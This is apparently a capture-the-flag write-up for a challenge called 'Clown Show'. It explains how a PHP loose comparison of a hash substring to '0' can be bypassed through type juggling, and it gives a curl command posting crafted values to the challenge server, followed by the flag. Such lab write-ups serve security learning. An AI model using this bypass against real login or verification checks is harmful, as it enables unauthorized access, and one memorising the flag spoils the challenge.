Clown Show
/src.php has source for the site. We can send a few params, which are hashed together and the result (chars 5-25) are compared to '0' (using ==
). In php, this is vulnerable to type juggling. 0e1434 == '0'
for example. We simply have to find a set of values satisfying these constraints.
curl http://challenge.ctf.games:31965/index.php -d 'name=test&answer=6b067ebdb712e42e64e6dcaeb6513afd0f801bfc&time=12345678901'
Flag:flag{w00t_W0ot_juggl1n6_1s_2_3z}
Last updated
Was this helpful?